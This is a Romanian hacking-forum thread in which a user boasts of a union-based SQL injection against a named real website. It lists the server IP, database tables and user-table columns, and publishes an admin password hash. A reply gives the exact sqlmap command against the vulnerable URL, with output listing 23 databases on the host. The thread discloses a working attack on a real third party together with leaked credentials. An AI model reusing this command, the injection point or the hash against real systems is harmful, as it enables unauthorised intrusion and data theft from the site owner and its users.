Jump to content
.Slacker

[SQLi] www.mida.ro

Recommended Posts

Posted

[+]Target:

www.mida.ro

[+]Author: .Slacker

[+]Host IP: 46.51.108.12

[+]Version: 5.1.47

[+]Injection-Type: Union Based

[+]Current DB: mida

[+]Tables:


CHARACTER_SETS,
COLLATIONS,
COLLATION_CHARACTER_SET_APPLICABILITY,
COLUMNS,
COLUMN_PRIVILEGES,
ENGINES,
EVENTS,
FILES,
GLOBAL_STATUS,
GLOBAL_VARIABLES,
KEY_COLUMN_USAGE,
PARTITIONS,
PLUGINS,
PROCESSLIST,
PROFILING,
REFERENTIAL_CONSTRAINTS,
ROUTINES,
SCHEMATA,
SCHEMA_PRIVILEGES,
SESSION_STATUS,
SESSION_VARIABLES,
STATISTICS,
TABLES,
TABLE_CONSTRAINTS,
TABLE_PRIVILEGES,
TRIGGERS,
USER_PRIVILEGES,
VIEWS,
adm,
anexe,
arhiva,
articol,
categorii,
categorii_arhiva,
categorii_stiri,
contact,
flash,
linkuri,
pagini,
parteneri,
subcategorii,
users,
7wx4rt5_aicontactsafe_config,
7wx4rt5_aicontactsafe_contactinformations,
7wx4rt5_aicontactsafe_fields,
7wx4rt5_aicontactsafe_fieldvalues,
7wx4rt5_aicontactsafe_messagefiles,
7wx4rt5_aicontactsafe_messages,
7wx4rt5_aicontactsafe_profiles,
7wx4rt5_aicontactsafe_statuses,
7wx4rt5_banner,
7wx4rt5_bannerclient,
7wx4rt5_ban

[+]Columns for users:


id,
user,
parola,
nume,
prenume,
adresa,
localitate,
telefon,
email,
data,
id,
nev,
knev,
unev,
password,
megye,
telepules,
cim,
ci,
aktiv,
email,
id,
externid,
objectclass,
signature,
company

Site-ul este plin de vulnerabilitati, deci imi voi permite sa fac publice datele de logare:


+-------------------------------------------------+
| Name: Password: |
| Admin 80f8e70b29c5966a919c38e0ca57c571 |
+-------------------------------------------------+

Posted (edited)
Super!

Postezi si sintaxa?

Merci!

Ce sintaxa vrei frate, nu te uiti ce scrie la el la location ? Toata treaba aia a durat doua secunde. Ce ca**t de hacking e asta ? A luat un link si a dat cu sqlmap pe el


hp ~ # sqlmap -u "http://www.mida.ro/content.php?id=21" --dbs --union-use

sqlmap/0.8 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 23:48:13

...............

web server operating system: Linux Fedora
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5

[23:48:14] [INFO] fetching database names
available databases [23]:
[*] ambalaj_ccihr
[*] costides_cartuse
[*] costides_corvina
[*] costides_dekoratex
[*] costides_sazy
[*] costides_transilva
[*] csalad
[*] csikisport
[*] hardwarecenter_hc
[*] hardwarecenter_szamla
[*] information_schema
[*] markbi
[*] mida
[*] munkacsy
[*] mysql
[*] parfum
[*] parfumworld
[*] salvator
[*] syrinx
[*] test
[*] twinart
[*] vkv
[*] zarafa

gata frate, am dat o comanda si sunt hacker, o sa fiu in imparatia cerului, ia sa-l pun inca odata pe show off pe RST, poate o sa capat respectul baietilor, ca sunt bazat :))

Edited by aelius
Guest Kovalski
Posted

Ba, eu am ceva de zis, nu stiu daca voi v-ati saturat sau nu de showoff-uri cu sql"i" dar eu personal m-am scarbit sa vad :

"lumea-copiilor.ro SQLI" WTF?!? cand vii cu un sqli (manual) in ceva ce sa merite atentia si timpul nostru de a citi cacatu ala de topic, atunci se poate numi showoff.

Momentan, ceea ce se posteaza pe la showoff sunt numai rable de siteuri cu admini mutalai care joaca Metin 8.

Asa ca eu propun ca, cine mai face post la showoff cu rable de siteuri primeste ban 1 saptamana.

Cine face sqli la un site mai de "Doamne, ajuta" si nu posteaza si sintaxa primeste ban 1 saptamana.

In categoria siteuri de "Doamne ajuta" nu intra "moloz.tk, lumea-copiilor.ro, gradinita-sector2.ro suruburi.si.piulite.net etc,etc.

Cine e de parere cu mos ps sa urle aici.

ps. intr-e timp... trash.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...